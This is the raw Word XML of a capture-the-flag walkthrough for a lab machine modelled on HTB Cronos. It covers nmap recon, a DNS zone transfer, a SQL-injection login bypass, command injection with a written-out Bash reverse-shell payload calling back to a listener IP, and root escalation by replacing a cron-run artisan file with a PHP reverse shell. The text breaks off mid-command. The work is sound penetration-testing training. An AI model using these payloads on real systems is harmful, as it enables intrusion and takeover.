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78DD" w14:textId="62B09044" w:rsidR="00046D62" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://0xdf.gitlab.io/2020/04/14/htb-cronos.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00046D62">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Referenced from HTB CRONOS</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (&lt;&lt; THIS IS A LINK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00873C64" w14:textId="6FE6A4FD" w:rsidR="00046C8C" w:rsidRDefault="00E014EC" w:rsidP="00046C8C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recon </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689D9CB" w14:textId="46568709" w:rsidR="00E014EC" w:rsidRDefault="00046C8C" w:rsidP="00046C8C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BB7A48" w14:textId="57BA022C" w:rsidR="00E014EC" w:rsidRPr="00E11B36" w:rsidRDefault="00E014EC">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- --min-rate 10000 192.168.109.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F223BC" w14:textId="6C36EF04" w:rsidR="00E014EC" w:rsidRDefault="00E014EC">
      <w:r w:rsidRPr="00E014EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="127C69F6" wp14:editId="49F9BF6F">
            <wp:extent cx="3620005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B14E" w14:textId="72A28A26" w:rsidR="00E014EC" w:rsidRPr="00E11B36" w:rsidRDefault="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 53,80,3306 192.168.109.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDB36A" w14:textId="609AD74D" w:rsidR="00046C8C" w:rsidRDefault="00046C8C">
      <w:r w:rsidRPr="00046C8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37191104" wp14:editId="57AEA815">
            <wp:extent cx="4801270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CC9" w14:textId="13F40A1D" w:rsidR="00046C8C" w:rsidRDefault="00046C8C"/>
    <w:p w14:paraId="1434A625" w14:textId="4E4FEA38" w:rsidR="00046C8C" w:rsidRDefault="00046C8C" w:rsidP="00046C8C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD949EC" w14:textId="1308F0AB" w:rsidR="00046C8C" w:rsidRPr="00E11B36" w:rsidRDefault="00046C8C" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Server 192.168.109.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59059B20" w14:textId="247E4BE2" w:rsidR="00046C8C" w:rsidRPr="00E11B36" w:rsidRDefault="00046C8C" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>192.168.109.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537FBA48" w14:textId="264368C8" w:rsidR="00046C8C" w:rsidRDefault="00046C8C">
      <w:r w:rsidRPr="00046C8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A933CD3" wp14:editId="7D916801">
            <wp:extent cx="2857899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7961" w14:textId="4BA5932B" w:rsidR="00046C8C" w:rsidRDefault="00E11B36" w:rsidP="00046C8C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Zone transfer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0BAA5F" w14:textId="57197B7B" w:rsidR="00E11B36" w:rsidRPr="00E11B36" w:rsidRDefault="00E11B36" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">dig </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>axfr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>crony.zhal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> @192.168.109.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1A1D54" w14:textId="07A2F2A8" w:rsidR="00E11B36" w:rsidRDefault="00E11B36" w:rsidP="00046C8C">
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097DA150" wp14:editId="33A237F4">
            <wp:extent cx="5601482" cy="2353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9C3" w14:textId="7E216702" w:rsidR="00E11B36" w:rsidRDefault="00E11B36" w:rsidP="00046C8C"/>
    <w:p w14:paraId="6279B42F" w14:textId="00AEE3F4" w:rsidR="00E11B36" w:rsidRDefault="00E11B36" w:rsidP="00046C8C">
      <w:r>
        <w:t xml:space="preserve">Add into Kali file </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D09BDE" w14:textId="4B48D677" w:rsidR="00E11B36" w:rsidRPr="00E11B36" w:rsidRDefault="00E11B36" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.109.50 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>crony.zhal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>admin.crony.zhal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> ns1.crony.zhal www.crony.zhal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037428BB" w14:textId="506BBFFC" w:rsidR="00E11B36" w:rsidRDefault="00E11B36" w:rsidP="00046C8C">
      <w:r w:rsidRPr="00E11B36">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF63EAF" wp14:editId="3DCFBF2D">
            <wp:extent cx="412490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2FAB" w14:textId="274026F4" w:rsidR="00E11B36" w:rsidRDefault="00E11B36" w:rsidP="00046C8C"/>
    <w:p w14:paraId="21C14430" w14:textId="56DF8E6A" w:rsidR="001D412B" w:rsidRDefault="002C7E24" w:rsidP="00046C8C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>NS1.crony.</w:t>
      </w:r>
      <w:r w:rsidR="001D412B">
        <w:t>zhal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001D412B">
        <w:t xml:space="preserve"> &amp; 192.168.109.50 brings you to this page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223D3A1" w14:textId="4E4F1937" w:rsidR="001D412B" w:rsidRDefault="001D412B" w:rsidP="00046C8C">
      <w:r w:rsidRPr="001D412B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15446209" wp14:editId="43CCB046">
            <wp:extent cx="4248743" cy="3639058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739EE" w14:textId="2FF84C6E" w:rsidR="001D412B" w:rsidRDefault="00D1477E" w:rsidP="00046C8C">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00BF7A1E" w:rsidRPr="00E91D1E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.crony.zhal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BF7A1E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BF7A1E">
        <w:t>crony.zhal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BF7A1E">
        <w:t xml:space="preserve"> brings you to this page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD71269" w14:textId="7B6DFC66" w:rsidR="00BF7A1E" w:rsidRDefault="00BF7A1E" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7A1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3179D2C0" wp14:editId="60ADFC75">
            <wp:extent cx="4327071" cy="1952459"/>
            <wp:effectExtent l="76200" t="76200" r="130810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73" cy="19586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8CFCA" w14:textId="3F2BE79B" w:rsidR="00046D62" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:r>
        <w:t xml:space="preserve">Click on the red flag to visit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and inspect page and you will find the 1st flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4707E896" w14:textId="1260EE97" w:rsidR="00046D62" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:r w:rsidRPr="00046D62">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD123FF" wp14:editId="106002FF">
            <wp:extent cx="3858063" cy="3520746"/>
            <wp:effectExtent l="76200" t="76200" r="142875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689" cy="353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EF0E5" w14:textId="271C6D64" w:rsidR="00046D62" w:rsidRPr="00046D62" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E952E9" w14:textId="7A1A1E54" w:rsidR="00BF7A1E" w:rsidRDefault="00BF7A1E" w:rsidP="00046C8C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admin.crony</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.zhal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D9C1071" w14:textId="77777777" w:rsidR="00046D62" w:rsidRDefault="00BF7A1E" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7A1E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B7F8F53" wp14:editId="4BB0A16F">
            <wp:extent cx="3337849" cy="2758679"/>
            <wp:effectExtent l="76200" t="76200" r="12954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58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5AA91" w14:textId="572F8901" w:rsidR="00046D62" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00046D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00046D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E48FAB" w14:textId="5742588B" w:rsidR="001D412B" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00046D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3246ED11" wp14:editId="0CF715C5">
            <wp:extent cx="2191056" cy="2305372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05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3F302" w14:textId="1A42456C" w:rsidR="00046D62" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection - </w:t>
      </w:r>
      <w:r w:rsidRPr="00046D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Net Tool Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2</w:t>
      </w:r>
      <w:r w:rsidRPr="00046D62">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274BC2BC" w14:textId="507A046F" w:rsidR="00046D62" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00046D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01CDD919" wp14:editId="16A8455F">
            <wp:extent cx="2467319" cy="1686160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8F5A1" w14:textId="50A51AF7" w:rsidR="00046D62" w:rsidRDefault="00046D62">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5EB4D" w14:textId="1DB71B50" w:rsidR="00813B95" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Key in the reverse shell into burp suite when intercepting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00813B95">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tracerout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00813B95">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ping execute command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69084813" w14:textId="149F7B92" w:rsidR="00046D62" w:rsidRDefault="00046D62" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00046D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command=bash+-c+'bash+-i+&gt;%26+/dev/tcp/192.168.109.146/500+0&gt;%261'%26host=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EAAEC7" w14:textId="7A3A29EE" w:rsidR="00813B95" w:rsidRDefault="00813B95" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(^ change to the kali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the port you are listening to)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B49604" w14:textId="71528D20" w:rsidR="00813B95" w:rsidRDefault="00813B95" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813B95">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="603189DE" wp14:editId="0FE25DEE">
            <wp:extent cx="4151811" cy="3384628"/>
            <wp:effectExtent l="76200" t="76200" r="134620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336" cy="338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CFCD0" w14:textId="5FCA46AE" w:rsidR="00813B95" w:rsidRDefault="00813B95" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Make sure to listen to the port first then forward the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344CDB17" w14:textId="53C1C857" w:rsidR="00813B95" w:rsidRDefault="00813B95" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813B95">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ADC426D" wp14:editId="14D959B1">
            <wp:extent cx="1933845" cy="1486107"/>
            <wp:effectExtent l="76200" t="76200" r="14287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FA25F" w14:textId="0FA62E6C" w:rsidR="00813B95" w:rsidRDefault="00813B95" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entered reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56139061" w14:textId="4796ADAF" w:rsidR="00C73F63" w:rsidRDefault="00813B95" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813B95">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4E8D2A" wp14:editId="4820B32C">
            <wp:extent cx="4058216" cy="1257475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7468A" w14:textId="1E949A0A" w:rsidR="00813B95" w:rsidRDefault="00813B95">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E63E36" w14:textId="596A8EA3" w:rsidR="00813B95" w:rsidRDefault="00C73F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Find the user.txt file under /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73F63">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E619377" w14:textId="701FD133" w:rsidR="00C73F63" w:rsidRDefault="00C73F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA9757C" wp14:editId="730CD582">
            <wp:extent cx="2429214" cy="52394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ED3B" w14:textId="67EEDD80" w:rsidR="00813B95" w:rsidRDefault="00813B95">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B472FB" w14:textId="3CAF0377" w:rsidR="00C73F63" w:rsidRDefault="00C73F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Under crontab &gt;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/crontab</w:t>
      </w:r>
      <w:r w:rsidR="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The artisan file will be executed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>everytime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09E09DA7" w14:textId="2124C53F" w:rsidR="00C73F63" w:rsidRDefault="00C73F63">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C31D082" wp14:editId="5002ED4E">
            <wp:extent cx="5125165" cy="1619476"/>
            <wp:effectExtent l="76200" t="76200" r="13271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19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78CBB" w14:textId="6E701D21" w:rsidR="000648BF" w:rsidRDefault="000648BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use a reverse shell script to p</w:t>
      </w:r>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>escalat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAFD3A3" w14:textId="3ECEBE4E" w:rsidR="000648BF" w:rsidRPr="000648BF" w:rsidRDefault="000648BF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/php/php-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="529EC8B0" w14:textId="1416DCEC" w:rsidR="00813B95" w:rsidRDefault="000648BF" w:rsidP="00046C8C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port accordingly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E132E07" w14:textId="4C261363" w:rsidR="000648BF" w:rsidRDefault="000648BF" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797722D5" wp14:editId="0D2CE2F4">
            <wp:extent cx="2143424" cy="1724266"/>
            <wp:effectExtent l="76200" t="76200" r="12382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31339" w14:textId="3E8F6895" w:rsidR="000648BF" w:rsidRDefault="000648BF" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Change the name of the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2AC02" w14:textId="1EABE81C" w:rsidR="000648BF" w:rsidRDefault="000648BF" w:rsidP="00046C8C">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mv </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000648BF">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./php-reverse-</w:t>
      </w:r>
